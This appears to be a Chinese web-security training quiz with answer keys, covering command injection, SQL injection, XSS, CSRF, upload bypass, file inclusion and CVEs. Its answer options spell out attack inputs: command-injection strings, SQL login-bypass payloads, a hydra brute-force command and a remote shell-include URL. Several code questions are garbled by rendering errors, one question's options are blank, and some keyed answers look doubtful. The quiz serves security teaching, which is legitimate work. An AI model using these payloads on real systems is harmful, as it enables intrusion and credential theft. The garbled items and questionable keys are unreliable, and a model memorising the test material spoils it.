您的答案: 标准答案: D

30、重命名一个文件或目录的函数是:

A、 rmdir

B、 unlink

C、 rename

D、 fopen

您的答案: 标准答案: C

31、下列函数中不属于命令执行函数的是:

A、 exec()

B、 proc_open()

C、 system()

D、 echo()

您的答案: 标准答案: D

32、php.ini中的安全模式是默认开启

A、 对

B、 错

您的答案: 标准答案: B

33、安装好XDebug后,需要配置什么文件才能够使用:

A、 php.ini

B、 .htaccess

C、 httpd.conf

D、 nsswitch.conf

您的答案: 标准答案: A

34、我们可以使用XDebug来跟踪,调试和分析PHP程序

A、 对

B、 错

您的答案: 标准答案: A

35、php程序中针对于安装问题的审计属于特定功能定向法:

A、 对

B、 错

您的答案: 标准答案: A

36、登录密码爆破属于哪一类漏洞:

A、 XSS

B、 sql注入

C、 撞库

D、 CSRF

您的答案: 标准答案: C

37、通过删除phpsessid,达到绕过验证码的目的,该攻击手法名称为:

A、 绕过sessid爆破

B、 修改sessid爆破

C、 sessid不更新造成爆破

D、 根据sessid生成验证码造成爆破

您的答案: 标准答案: A

38、通过使用不易被识别的验证码,且不根据sessid生成验证码内容能够有效防止爆破攻击

A、 对

B、 错

您的答案: 标准答案: A

39、下列漏洞中,哪些不属于注入漏洞:

A、 命令执行

B、 XSS

C、 敏感信息泄漏

D、 sql注入

您的答案: 标准答案: C

40、下列函数中,哪个不能用来执行命令注入漏洞:

A、 system()

B、 exec()

C、 echo()

D、 passthru()

您的答案: 标准答案: C

41、使用正则表达式对输入的参数进行过滤,能够达到修补和防御命令注入漏洞

A、 对

B、 错

您的答案: 标准答案: A

42、本机文件包含漏洞不能够包含哪些文件:

A、 日志文件

B、 本地网站文件

C、 远程木马文件

D、 session文件

您的答案: 标准答案: C

43、当allow_url_include和allow_url_fopen都设置为off时,能够直接包含共享文件

A、 对

B、 错

您的答案: 标准答案: A

44、下列注入漏洞不属于sql注入的是:

A、 数字型注入

B、 字符型注入

C、 cookie注入

D、 跨站脚本注入

您的答案: 标准答案: D

45、下列功能点不能够造成sql注入的有:

A、 使用模糊查询

B、 waf替换关键字

C、 使用id进行查询

D、 网站html标签过滤不完善

您的答案: 标准答案: D

46、使用完善的waf脚本且对sql语句中的参数进行处理,能够修补和杜绝sql注入漏洞

A、 对

B、 错

您的答案: 标准答案: A

47、截断注入在什么情况下比较适用:

A、 无法闭合单引号进行注入时

B、 数据库语句为双条件

C、 当无法闭合单引号进行注入时且为数据库语句为双条件

D、 当无法闭合单引号进行注入时不为数据库语句为双条件

您的答案: 标准答案: C

48、下列选项对二次注入说法正确的是:

A、 当用户输入的恶意数据首次传送给数据库时,将会进行安全的处理,但当应用程序调用时将会以一种危险的方式运行

B、 当用户输入的恶意数据传送给数据库时,应用程序调用时将会以一种危险的方式运行

C、 如果无法注释sql语句则无法进行二次注入攻击

D、 无法闭合单引号是,无法进行二次注入攻击

您的答案: 标准答案: A

49、为所有数据库访问使用参数查询并参数化集成到查询中的每个数据项,可以有效的防御二次注入漏洞

A、 对

B、 错

您的答案: 标准答案: A

50、任意文件读取属于什么漏洞:

A、 文件操作漏洞

B、 数据库操作漏洞

C、 XSS漏洞

D、 文件包含漏洞

您的答案: 标准答案: A

1、下列哪个操作不能通过越权漏洞来实现:

A、 修改管理员密码

B、 修改其他人帐号密码

C、 删除网站代码

D、 查看其它人信息

您的答案: 标准答案: C

2、越权漏洞分为平行越权和垂直越权:

A、 对

B、 错

您的答案: 标准答案: A

3、下列对跨站脚本攻击(XSS)的描述正确的是:

A、 XSS 攻击指的是恶意攻击在 WEB 页面里插入恶意代码, 当用户浏览该页面时嵌入其中 WEB 页面的代码会被执行

B、 XSS 攻击是 DOOS 攻击的一种变种

C、 XSS 攻击就是 CC 攻击

D、 XSS 攻击就是利用被控制的机器不断地向被攻击网站发送访问请求

您的答案: 标准答案: A

4、下列选项中,对非持久型xss攻击说法正确的是:

A、 非持久型XSS攻击是一次性的

B、 非持久型XSS攻击可以持续攻击,具有持续性

C、 非持久型XSS攻击是将攻击语句插入到服务器端

D、 非持久型XSS攻击可以对所有访问该网页的用户进行攻击

您的答案: 标准答案: A

5、根据近几年的统计web应用漏洞影响率最高的漏洞是

A、 XSS

B、 SQL注入

C、 信息泄露

您的答案: 标准答案: A

6、128位安全套接层技术是指哪种

A、 SSH

B、 SSL

C、 SH

您的答案: 标准答案: B

7、再互联网早期没有动态内容都是静态内容

A、 对

B、 错

您的答案: 标准答案: A

8、劫持账号是属于何种权限提升

A、 水平权限提升

B、 垂直权限提升

C、 扩展权限提升

您的答案: 标准答案: B

9、IIS或APCHE这种http底层服务器软件是属于哪种分类

A、 web应用

B、 web平台

C、 web客户端

您的答案: 标准答案: B

10、web应用攻击包括资源和认证,会话攻击等

A、 对

B、 错

您的答案: 标准答案: A

11、HTTP首部字段中的Host指的是以下哪种

A、 请求资源所在服务器

B、 发送指令的主机

C、 使用者的主机地址

您的答案: 标准答案: A

12、临时重定向在HTTP状态码中的数字代号是

A、 301

B、 302

C、 503

您的答案: 标准答案: B

13、以下属于HTTP方法的是

A、 POST

B、 ACL

C、 Cookie

您的答案: 标准答案: A

14、get方式只能支持ASCII字符

A、 对

B、 错

您的答案: 标准答案: A

15、关于CSRF说法正确的是

A、 删掉referer字段可以用来防止CSRF攻击

B、 CSRF攻击只能利用GET方式去达到攻击的目的

C、 登录受信任网站A,并在本地生成Cookie,在不登出A的情况下,访问危险网站B这样有可能会受到CSRF攻击

D、 XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站

您的答案: 标准答案: D

16、xss和csrf的漏洞原理是一样的

A、 对

B、 错

您的答案: 标准答案: B

17、利用CSRF漏洞进行测试,相关说法错误的是

A、 CSRF是利用管理员的操作在无声无息中进行

B、 攻击者在无法预计管理员操作的过程中也是可以进行CSRF的攻击操作

C、 普通用户插入备份数据库的代码后,通过CSRF管理员触发到代码后会自动备份网站的数据库

D、 默认设置情况下,找到备份数据库的网站路径即可下载网址的.sql文件

您的答案: 标准答案: B

18、CSRF可以在无声无息中进行管理员的操作

A、 对

B、 错

您的答案: 标准答案: A

19、关于验证码说法错误的是

A、 为了防止恶意破解密码,刷票,论坛灌水,刷页

B、 可以防止黑客对特定注册用户特定程序进行暴力破解登陆

C、 验证码通常使用一些线条和一些不规则的字符组成

D、 通过手机短信发送的4位数验证码是非常安全的

您的答案: 标准答案: D

20、保证验证码的新鲜度可以有效的防止大多数暴力破解攻击

A、 对

B、 错

您的答案: 标准答案: A

21、绕过验证码的方法不包括

A、 统默认不显示验证码,而是在用户校验错误一定次数之后再出现,在cookie中写入一个标记,比如loginErr = 1,后续错误累加。 攻击者不带Cookie提交请求即可绕过验证码功能。

B、 验证码在web服务器上对应一个session值,攻击者在cookie中带固定的sessionID和固定的一个验证码字符串,即可轻松爆破。

C、 程序把验证码的内容发送到客户端cookie、或输出到response headers的其他字段,攻击者可以轻松逆向破解得到原值。

D、 如果实施ip策略强制输入验证码,这样可以防止验证码的安全问题,没办法攻破

您的答案: 标准答案: D

22、安全的验证码使用规则最合适的是验证码只能用一次

A、 对

B、 错

您的答案: 标准答案: A

23、关于验证码识别并且暴力破解密码说法错误的是

A、 4位数的图像验证码是可以被工具直接识别的,安全性形同虚设

B、 爆破成功以后会提示302跳转登陆

C、 不管验证码是图片还是数字,只要随机不够,图片干扰不够还是有机会可以进行验证码的机器识别

D、 验证码可以解决90%以上的Web安全问题

您的答案: 标准答案: D

24、解决验证码识别问题是攻击者为了更好的进行暴力破解攻击

A、 对

B、 错

您的答案: 标准答案: A

25、php中哪些函数可以执行系统命令

A、 file_put_contents

B、 system

C、 print_r

D、 var_dump

您的答案: 标准答案: B

26、系统命令执行是指应用程序对传入命令行的参数过滤不严导致恶意用户能控制最终执行的命令

A、 对

B、 错

您的答案: 标准答案: A

27、通过php哪项配置可以禁止webshell执行系统命令

A、 disable_setting

B、 disable_shell

C、 disable_functions

D、 disable_config

您的答案: 标准答案: C

28、``可以执行系统命令

A、 对

B、 错

您的答案: 标准答案: A

29、对于下面代码,能成功执行命令的选项是 <?php if( isset( $_POST[ ‘Submit’ ] ) ) { t a r g e t = t r i m ( target = trim( target=trim(_REQUEST[ ‘ip’ ]); KaTeX parse error: Expected 'EOF', got '&' at position 25: …ions = array( '&̲amp;' =&gt; '',…’ => ‘’, ‘(’ => ‘’, ‘)’ => ‘’, ‘`’ => ‘’, ); $target = str_replace( array_keys( $substitutions ), $substitutions, $target ); $cmd = shell_exec( 'ping -c 4 ’ . KaTeX parse error: Expected 'EOF', got '&' at position 8: target &̲#41;; print_r(cmd); } ?>

A、 ip=127.0.0.1|whoami

B、 ip=127.0.0.1&whoami

C、 ip=127.0.0.1||whoami

D、 ip=127.0.0.1&&whoami

您的答案: 标准答案: C

30、对于下面代码,能成功执行”whoami”的选项是 <?php $cmd=system("ping -c 2 ".$_GET['ip']); print_r($cmd); ?>

A、 ip=127.0.0.1|whoami

B、 ip=127.0.0.1&whoami

C、 ip=127.0.0.1||whoami

D、 ip=127.0.0.1&&whoami

您的答案: 标准答案: A

31、如果||的前面命令执行失败则执行 || 后面的命令

A、 对

B、 错

您的答案: 标准答案: A

32、关于MS15-034HTTP远程代码执行漏洞说法正确的是

A、 利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。

B、 该漏洞对服务器系统造成了不小的影响,主要影响了Centos,redhat等LINUX的主流服务器操作系统。

C、 MS15-034HTTP远程代码执行漏洞的CVE编号为CVE-2015-1647

D、 Http.sys 为了在Windows平台上优化niginx服务器性能而引入的一个内核模式驱动程序。它为niginx及其他需要运用HTTP协议的微软服务器功能提供HTTP请求的接收与响应、快速缓存、提高性能、日志等功能服务。

您的答案: 标准答案: A

33、MS15-034可以进行本地提权

A、 对

B、 错

您的答案: 标准答案: B

34、关于Jboss反序列化漏洞说法有误的是

A、 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程

B、 Jboss反序列化漏洞是在反序列化时并没有限制实例化对象的类型,导致可以任意构造应用中已经包含的对象利用反序列化操作进行实例化。

C、 Java 在进行反序列化操作的时候会使用 ObjectInputStream 类调用 readObject() 方法去读取传递过来的序列化对象字节流进行处理

D、 Boss反序列化漏洞文件是JMXInvokerServlet

您的答案: 标准答案: D

35、解决Jboss远程方法调用漏洞把invoker删除再把1099关闭即可

A、 对

B、 错

您的答案: 标准答案: A

36、关于st2说法错误的是

A、 存在st2漏洞的网站可以执行命令

B、 存在st2漏洞的网站大多数是最高权限

C、 s2-016参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行

D、 st2漏洞会导致php网站被攻陷

您的答案: 标准答案: D

37、st2漏洞是没有正确过滤用户的输入输出导致的问题

A、 对

B、 错

您的答案: 标准答案: A

38、关于心脏出血漏洞说法错误的是

A、 Heartbleed漏洞产生是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查

B、 Heartbleed漏洞可以获得https传输的用户名与密码、聊天工具的消息、电子邮件以及重要的商业文档和通信等数据

C、 Heartbleed漏洞是近几年来影响广泛,覆盖面广,危害很高的漏洞之一

D、 利用Heartbleed漏洞用户每次读取都能获得相关用户名密码

您的答案: 标准答案: D

39、关于CVE-2015-4024说法有误的是

A、 是PHP multipart/form-data 导致的远程DOS漏洞

B、 因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS

C、 在该漏洞中multipart_buffer_headers函数解析header对应value时,value值是不存在的

D、 升级PHP版本可以很好的抵御该漏洞的攻击

您的答案: 标准答案: C

40、DDOS攻击也有可能是代码本身导致的问题

A、 对

B、 错

您的答案: 标准答案: A

41、关于逻辑/越权漏洞说法有误的是

A、 任意用户查询,任意删属于越权漏洞,而密码找回漏洞属于逻辑漏洞

B、 一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。

C、 垂直权限的访问控制缺失是逻辑/越权漏洞的根本原因

D、 密码找回漏洞是权限管理不足导致的问题

您的答案: 标准答案: D

42、挖掘密码找回逻辑漏洞黑盒Fuzz来推断程序代码是关键

A、 对

B、 错

您的答案: 标准答案: A

43、关于密码找回说法有误的是

A、 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解

B、 有些密码找回凭证可从客户端直接获取

C、 密码找回凭证存与单个用户绑定的可以解决密码找回漏洞

D、 修改密码过程中,验证码是可操作的话 可以直接导致密码重置

您的答案: 标准答案: C

44、有时候我们可以通过注入漏洞来控制找回密码的凭证来达到密码重置的目的

A、 对

B、 错

您的答案: 标准答案: A

45、关于越权漏洞说法有误的是

A、 1. 越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定

B、 2. 挖掘越权漏洞一般是从一些拥有敏感信息的地方(例如:收货地址/个人资料/用户订单等)进行测试

C、 3. 处理越权漏洞可以通过用户对某一数据进行增删改查时需要去校验下所操作的数据是否属于该用户

D、 4. 越权漏洞的本身对网站不会照成攻击伤害

您的答案: 标准答案: D

46、下列关于暴力破解说法错误的是

A、 1. 暴力猜解就是将密码进行逐个推算,直到找到正真的密码为止

B、 2. 暴力破解分为c/s架构的破解和b/s架构的破解

C、 3. 暴力破解的成功率取决于字典的准确性和覆盖性

D、 4. 只要有数据传输的地方就可以进行暴力破解

您的答案: 标准答案: D

47、 暴力破解即是一个无限穷举的过程

A、 对

B、 错

您的答案: 标准答案: A

48、关于hydra使用说法有误的是

A、 hydra在Linux和windows平台上都可以使用

B、 爆破ssh hydra -L users.txt -P password.txt -t 1 -vV -e ns x.x.x.x ssh

C、 hydra可以支持大多数服务和协议

D、 hydra可以支持一个C段服务器的22端口爆破

您的答案: 标准答案: D

49、关于eWebEditor编辑器说法有误的是

A、 1. eWebEditor编辑器一般都是通过默认口令进入后台来拿shell

B、 2. 加入下载到ewebeditor.mdb可以通过某些工具来读取管理员密码

C、 3. eWebEditor后台修改自定义上传后缀即可拿shell

D、 4. 可以配合iis6等服务器的解析漏洞来获得网站的webshell

您的答案: 标准答案: D

50、关于FCKeditor 说法有误的是

A、 1. 默认查看编辑器版本通过FCKeditor/_whatsnew.html

B、 2. 默认编辑页FCKeditor/_samples/default.html 等等

C、 3. 在FCKeditor2.2到2.4.2的php版本中存在任意文件上传

D、 4. FCKeditor只有任意文件上传漏洞

您的答案: 标准答案: D

1、phpmyadmin某些低版本中存在的万能密码是

A、 localhost’@’@’

B、 localhost’@’@"

C、 localhost’@"@"

您的答案: 标准答案: B

2、通过扫描器很难扫描到逻辑漏洞,这种说法正确吗

A、 对

B、 错

您的答案: 标准答案: A

3、IIS 组件中不包括以下哪项服务?

A、 WEB 服务

B、 FTP 服务

C、 APACHE 服务

D、 SMTP 服务

您的答案: 标准答案: C

4、在网站属性的目录安全性中,不可以定义的是以下哪一项?

A、 身份验证和访问控制

B、 目录权限设置

C、 IP地址和域名限制

D、 安全通信

您的答案: 标准答案: B

5、IIS 安装后,默认可以使用ASP、ASP.NET等功能,是否正确?

A、 对

B、 错

您的答案: 标准答案: B

6、FTP 服务默认端口是?

A、 21

B、 80

C、 8080

D、 22

您的答案: 标准答案: A

7、以下哪个命令可往FTP服务器传输文件?

A、 GET

B、 INPUT

C、 PUT

D、 OPEN

您的答案: 标准答案: C

8、FTP 主要是用来实现客户端与服务器的文件传输,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

9、使用以下哪个选项可以查看本机路由表?

A、 route add

B、 route print

C、 route delete

D、 route change

您的答案: 标准答案: B

10、以下不属于 “ 外部网络协议” 主要功能的是?

A、 用于外部邻站的获取

B、 用于邻站的可达性测试

C、 用于选路由信息更新

D、 用于本地系统内部使用的选路协议

您的答案: 标准答案: D

11、Windows Server 2003的 “路由和远程访问” 服务是一个全功能的软件路由器,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

12、按照协议分类,以下不属于VPN类型的是?

A、 PPTP

B、 L2TP

C、 IPSec

D、 TCP

您的答案: 标准答案: D

13、Windows Server 2003中,远程访问策略,默认有几个?

A、 1

B、 2

C、 3

D、 4

您的答案: 标准答案: B

14、某公司员工出差到外地,他想访问企业内网的服务器资源,这时候我们可以通过VPN技术来实现,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

15、以下哪个命令可以查看Linux系统是否安装了BIND程序包?

A、 rpm -q bind

B、 rpm -i bind

C、 rpm -v bind

D、 rpm -h bind

您的答案: 标准答案: A

16、以下哪个选项可以重启DNS服务?

A、 service named stop

B、 service named start

C、 /etc/rc.d/init.d/named stop

D、 service named restart

您的答案: 标准答案: D

17、在主配置文件中添加所规划的正向区域和反向区域,以“zone”为关键字设定区域,指向区域文件所在位置和文件名,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

18、在 wireshark筛选器中,可以捕获出所有 ip 为 192.168.1.1 的是?

A、 ip.src == 192.168.1.1

B、 ip.dst == 192.168.1.1

C、 ip.addr == 192.168.1.1

D、 !(ip.src == 192.168.1.1)

您的答案: 标准答案: C

19、对于筛选器中输入 ip.addr == 192.168.1.1 and tcp.port == 8080描述正确的是?

A、 筛选出目的IP地址为 192.168.1.1 并且端口为 8080 的数据包

B、 筛选出目的IP地址为 192.168.1.1 或者端口为 8080 的数据包

C、 筛选出所有IP地址为 192.168.1.1 并且端口为 8080 的数据包

D、 筛选出所有IP地址为 192.168.1.1 或者端口为 8080 的数据包

您的答案: 标准答案: C

20、在 wireshark筛选器中,输入 http 可以捕获 http 协议的数据包,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

21、wireshark 中,Statistics菜单项下的 Protocol Hierarchy 选项主要功能是什么?

A、 显示捕捉数据摘要

B、 显示协议统计分层信息

C、 显示会话列表

D、 显示端点列表

您的答案: 标准答案: B

22、wireshark中最活跃的通讯端点,并不一定包括流量最大的会话,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

23、在IO Graphs 中,可以使用哪项命令排查有丢失的数据包?

A、 tcp.analysis.lost_segment

B、 tcp.analysis.window_update

C、 tcp.analysis.ack_rtt

D、 tcp.analysis.duplicate_ack

您的答案: 标准答案: A

24、我们可以使用 wireshark 中的 IO Graph来对网络整体流量信息进行显示分析,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

25、以下哪个文件夹存放的是 wireshark 负责解析网络协议文件?

A、 Core

B、 Capture

C、 Epan

D、 Wiretap

您的答案: 标准答案: C

26、FTP协议使用443端口而不是标准21端口时,我们可以强制将解析错误的包按照指定协议解析,是否正确?

A、 对

B、 错

您的答案: 标准答案: A

27、设置后,达到无法通过客户端 JavaScript 直接访问 Cookie 的选项是

A、 Domain

B、 Expires

C、 Secure

D、 HttpOnly

您的答案: 标准答案: D

28、下列选项中,状态码解释错误的选项是

A、 200: 表示已成功提交请求,且相应主体中包含请求结果

B、 400: 表示客户端提交了一个无效的 HTTP 请求

C、 414: 服务器无法处理客户端发送的不带Content-Length的请求信息

D、 500:服务器内部错误,无法完成请求

您的答案: 标准答案: C

29、下列选项中,表示将浏览器暂时重定向到另外一个在 Location 消息头中指定的 URL 的状态码是

A、 100

B、 201

C、 302

D、 403

您的答案: 标准答案: C

30、HTTPS 本质与 HTTP 一样,都属于应用层协议,但 HTTPS 通过安全传输机制——安全套阶层(Secure Socket Layer,SSL)来传送数据。这种说法正确吗()

A、 对

B、 错

您的答案: 标准答案: A

31、下列 URL 编码解释错误的是:

A、 %3d 代表 =

B、 %25 代表 %

C、 %0a 代表新行

D、 %00 代表空格

您的答案: 标准答案: D

32、下面 HTML 编码解释错误的是:

A、 " 代表 "

B、 &apos 代表 ’

C、 < 代表 <

D、 > 代表 <

您的答案: 标准答案: D

33、如果没有启用 WebDAV 扩展,OPTIONS 命令是无法查看 IIS 支持的方法集合的。即便是复选上了“写入”,仍然无法写入 txt 文件。该说法正确吗()

A、 对

B、 错

您的答案: 标准答案: A

34、动态语言,服务器和客户端代码不一致;静态语言,服务端和客户端代码一致。该说法是否正确()

A、 对

B、 错

您的答案: 标准答案: A

35、下列一键 PHP 环境的工具中,不可以安装在 Linux 中的是()

A、 PHPStudy

B、 PHPNow

C、 WampServer

D、 XAMPP

您的答案: 标准答案: C

36、下列 ASP 接受参数的方式错误的是()

A、 request

B、 request.get

C、 request.cookie

D、 request.form

您的答案: 标准答案: B

37、下列链接中不存在注入点的是()

A、 http://www.****.com/***.asp?id=XX

B、 http://www.****.com/***.php?name=XX&page=99

C、 http://www.****.com/index/new/php-8.html

D、 http://www.****.com/news.html

您的答案: 标准答案: D

38、下列 mysql 的 PHP 函数说法错误的是()

A、 mysql_connect(‘host’, ‘username’, ‘pass’); 连接 mysql 链接

B、 mysql_db_select($database, $conn); 选择数据库

C、 mysql_query($sql, $conn); 执行 SQL 语句

D、 mysql_fetch_array($result); 将查询结果的一条返回到一个数组中

您的答案: 标准答案: B

39、下面说法是否正确,注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明()

A、 对

B、 错

您的答案: 标准答案: A

40、程序使用 SQLServer 数据库,当程序登录页面存在注入时,下列选项中,属于万能密码的是()

A、 用户名输入: '(或") AND 1 = 1-- ;密码随便输入

B、 用户名输入: '(或") && 1 = 1-- ;密码随便输入

C、 用户名输入: '(或") OR 1 = 1-- ;密码随便输入

D、 用户名输入: '(或") || 1 = 1-- ;密码随便输入

您的答案: 标准答案: C

41、已知 SQL 语句为: s q l = ′ S E L E C T ∗ F R O M ‘ m e m b e r ‘ W H E R E ‘ u s e r n a m e ‘ = &quot; ′ . sql = &#x27;SELECT * FROM `member` WHERE `username` = &quot;&#x27;. sql=SELECTFROMmemberWHEREusername="._GET[‘name’].’" AND password = “’.$_GET[‘pwd’].’”’; ,当访问 http://xxx.com?name=admin" OR “1”=“2&pwd=” OR “1”="1 时,可以完成用户验证吗()

A、 对

B、 错

您的答案: 标准答案: A

42、已知字符型注入语句 s q l = ′ S E L E C T ∗ F R O M ‘ m e m e b e r ‘ W H E R E ‘ u s e r n a m e ‘ = &quot; ′ . sql = &#x27;SELECT * FROM `memeber` WHERE `username` = &quot;&#x27;. sql=SELECTFROMmemeberWHEREusername=".user.’" AND pass = “’.$pass.’”’,下列能成功执行注入的是()

A、 $user = ‘admin OR 1 = 1–’; $pass = ‘something’;

B、 $user = ‘admin OR 1 = 2’; $pass = ‘" OR 1 = 1’;

C、 $user = ‘admin" OR 1 = 1’; $pass = ‘" OR 1 = 2’;

D、 $user = ‘admin" OR “1” = "2’; $pass = ‘" OR “1” = "1’;

您的答案: 标准答案: D

43、MySQL 5 中新增了一个 information_schema 库,该库中存储了数据库信息内容,可直接爆库、爆表、爆字段;而 MySQL 4 只能采用类似 Access 的方法进行查询猜解,该说法是否正确()

A、 对

B、 错

您的答案: 标准答案: A

44、用 ORDER BY 来判断字段数量时,ORDER BY 后面跟 5 时,正常返回,后面跟 6 时,报 Unknown column ‘6’ in ‘order clause’ 错误,当前目标表有几个字段()

A、 4

B、 5

C、 6

D、 7

您的答案: 标准答案: B

45、使用 ORDER BY 手工注入进行字段数判断时,ORDER BY 6 未报错,ORDER BY 7 报 UNKNOWN COLUMN ‘7’ IN ‘ORDER CLAUSE’,该表有几个字段()

A、 5

B、 6

C、 7

D、 8

您的答案: 标准答案: B

46、已知 MySQL 版本大于 5,手工注入时,访问 http://127.0.0.1/index.php?id=3’%20SELECT%20GROUP_CAT(SCHEMA_NAME)%20FROM%20INFROMATION_SCHEMA.SCHEMATA,可以获取到的是()

A、 所有数据库

B、 所有表

C、 所有字段

D、 所有字段类型

您的答案: 标准答案: A

47、在 MySQL INFORMATION_SCHEMA 数据库中,保存数据库信息的表是()

A、 TABLES

B、 SCHEMATA

C、 COLUMNS

D、 DATABASES

您的答案: 标准答案: B

48、SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1 ,该语句查询的是当前数据库的第一条表信息,该说法正确吗()

A、 对

B、 错

您的答案: 标准答案: A

49、下列 MySQL 的 SQL 语句中,能同时查询用户、数据库版本、数据库并以 , 分割的是()

A、 SELECT user(),version(),database();

B、 SELECT user(),’,’,version(),’,’,database();

C、 SELECT user().version().database();

D、 SELECT group_concat(user(),version(),database());

您的答案: 标准答案: D

50、下列 MySQL 的 SQL 语句中,能够查询所有数据库的是()

A、 SELECT TABLE_NAME FROM INFROMATION_SCHEMA.TABLES;

B、 SELECT SCHEMA_NAME FROM INFROMATION_SCHEMA.SCHEMATA;

C、 SELECT DATABASE_NAME FROM INFROMATION_SCHEMA.DATABASES;

D、 SELECT COLUMN_NAME FROM INFROMATION_SCHEMA.COLUMNS;

您的答案: 标准答案: B

1、下列有关 ASP、PHP 接受参数的方式错误的是()

A、 ASP:request.get(接收 get 传参)

B、 PHP:$_GET(接收 get 传参)

C、 ASP:request(全部接收)

D、 PHP:$_REQUEST(全部接收)

您的答案: 标准答案: A

2、当使用 Burp 进行 Cookie 手工注入的时候,下列可以判断是否报错的是()

A、 X-Powered-By

B、 Content-Length

C、 Content-Type

D、 Cache-control

您的答案: 标准答案: B

3、下列命令能实现 SQLMap Cookie 注入的是()

A、 sqlmap.py -u “http://www.xxx.com/product.php?id=58

B、 sqlmap.py -u “http://www.xxx.com/product.php” --data “id=58”

C、 sqlmap.py -u “http://www.xxx.com/product.php” --data “id=58” --level 1

D、 sqlmap.py -u “http://www.xxx.com/product.php” --cookie “id=58” --level 2

您的答案: 标准答案: D

4、XSS属于服务端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一

A、 对

B、 错

您的答案: 标准答案: B

5、存储型XSS,持久化,代码是存储在服务器中的;反射型XSS,非持久化,需要欺骗用户自己去点击链接才能触发XSS代码

A、 对

B、 错

您的答案: 标准答案: A

6、下面属于隐蔽型的 XSS 的选项是:

A、 反射型 XSS

B、 存储型 XSS

C、 不持久型 XSS

您的答案: 标准答案: B

7、当网站对

A、 alert(1)

B、

C、

D、 alert(1)

您的答案: 标准答案: C

8、XSS能够对网站进行攻击且造成网站权限丢失()

A、 对

B、 错

您的答案: 标准答案: B

9、下面上传突破说法错误的是()

A、 客户端 JavaScript 可以通过 Burp 抓包修改进行上传

B、 服务端 MIME 类型检测可以通过修改 Content-Type 进行上传

C、 服务端文件扩展名检测可以通过服务端解析漏洞,上传其他扩展名文件进行突破

D、 使用 a.asp;.jpg 对 IIS 8.0 服务器进行上传突破

您的答案: 标准答案: D

10、在非 PHP 的 WEB 安全中出现概率很大而且威力也很大的攻击主要有两种,第一种是 SQL 注入,第二种是上传攻击。该说法正确吗()

A、 对

B、 错

您的答案: 标准答案: A

11、使用 Burp 抓包实验 0x00 截断时,下面做法可以完成绕过的是()

A、 直接在抓的包中修改 filename 部分,将可以上传的扩展名前面加空格拼接到文件后面

B、 直接在抓的包中修改 Content-Type

C、 在 Burp 抓的包中选择 Hex(十六进制),修改符合条件的后缀名前面点的十六进制为 00

您的答案: 标准答案: C

12、服务器检测绕过(目录路径检测),因为对目录路径的检测不够严谨而导致可以使用 0x00 截断攻击,该说法是否正确()

A、 对

B、 错

您的答案: 标准答案: A

13、在 fckeditor 2.4.3 或之前版本的黑名单中 ConfigDeniedExtensions.Add “File”, “html|htm|php|php2|php3|php4”,下列方法中可以绕过上传 php 文件的是()

A、 上传文件 shell.PhP

B、 上传文件 shell.php4

C、 上传文件 shell.php3

D、 上传文件 shell.php .jpg

您的答案: 标准答案: A

14、已知服务器为 Apache,且后缀名 123abc 未在黑名单中、后缀名 asp 在黑名单中,上传 shell.asp.123abc 文件能否成功执行()

A、 对

B、 错

您的答案: 标准答案: A

15、利用 IIS 解析漏洞,含有一句话木马的文件 test.php;.jpg,可以被菜刀连接成功吗()

A、 对

B、 错

您的答案: 标准答案: A

16、下列即属于黑名单检测绕过又属于白名单检测绕过的是()

A、 文件名大小写绕过

B、 名单列表绕过

C、 特殊文件名绕过(windows)

D、 0x00 截断绕过

您的答案: 标准答案: D

17、一个文件名为 x1.x2.x3 的文件,Apache 会从 x3 的位置往 x1 的位置开始尝试解析,一直往前解析,直到遇到一个能解析的扩展名为止,该说法正确吗()

A、 对

B、 错

您的答案: 标准答案: A

18、当 PHP 配置设置为可以远程包含时,下列是远程包含的是()

A、 http://www.mubiao.com/file.php?read=../../../image/shell.php

B、 http://www.mubiao.com/file.php?read=/image/shell.php

C、 http://www.mubiao.com/file.php?read=C:/htdocs/image/shell.php

D、 http://www.mubiao.com/file.php?read=http://www.xxx.com/shell.php

您的答案: 标准答案: D

19、当 PHP 配置文件中, allow_url_include 设置为 off 时,可以包含远程文件,该说法正确吗()

A、 对

B、 错

您的答案: 标准答案: B

20、对第三方组件慎重使用说法错误是():

A、 尽量从官方渠道下载第三方组件

B、 对第三方组件的安全测试

C、 对第三方组件不需要安全加固、补丁更新

D、 对第三方组件的定期升级计划

您的答案: 标准答案: C

21、为了减少编程错误引起的安全缺陷,Java开发者不应该遵循建议的安全开发规范。()

A、 对

B、 错

您的答案: 标准答案: B

22、通过恶意手段耗尽被攻击对象的资源,让目标计算机或网络服务无法提供正常的服务、资源访问,使目标服务系统停止响应崩溃。

A、 对

B、 错

您的答案: 标准答案: A

23、下面这段XML代码,当程序加载的时候,会尝试写一段代码到/dev/tty文件里。

A、 对

B、 错

您的答案: 标准答案: B

24、JAVA出现数组越界,不会抛出异常,会继续执行。

A、 对

B、 错

您的答案: 标准答案: B

25、安全部署前、中、后的那一句是正确的():

A、 部署后进行漏洞扫描,渗透测试,日常运维,包括WEB漏洞扫描

B、 发现缺陷部署前,不需要对软件安全检测

C、 基础软件的安全性不影响将来承载的应用软件的安全性

D、 部署中应关闭上线过程临时开放的端口服务

您的答案: 标准答案: A

